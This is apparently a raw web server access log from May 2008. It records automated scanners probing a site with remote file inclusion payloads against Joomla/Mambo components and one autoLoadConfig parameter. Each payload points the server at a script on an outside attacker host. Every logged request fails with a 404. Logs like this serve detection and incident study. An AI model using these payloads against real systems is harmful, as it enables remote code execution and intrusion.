204.11.238.133 - - [14/May/2008:22:44:06 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
204.11.238.133 - - [14/May/2008:22:44:06 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:44:13 -0700] "GET /logs/access_080501.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:44:13 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:44:13 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.200.58.99 - - [14/May/2008:22:44:40 -0700] "GET /logs/access_080501.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:44:46 -0700] "GET /logs/access_080501.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:44:47 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
207.58.151.211 - - [14/May/2008:22:44:47 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:45:13 -0700] "GET /logs/access_080501.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:45:13 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:45:14 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:45:28 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.jainvestigation.com"
217.31.58.188 - - [14/May/2008:22:45:29 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.jainvestigation.com"
216.6.180.69 - - [14/May/2008:22:45:39 -0700] "GET /logs/access_080501.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://chapolin.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:45:42 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainvestigation.com"
195.82.99.126 - - [14/May/2008:22:45:46 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://chapolin.itrello.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "jainves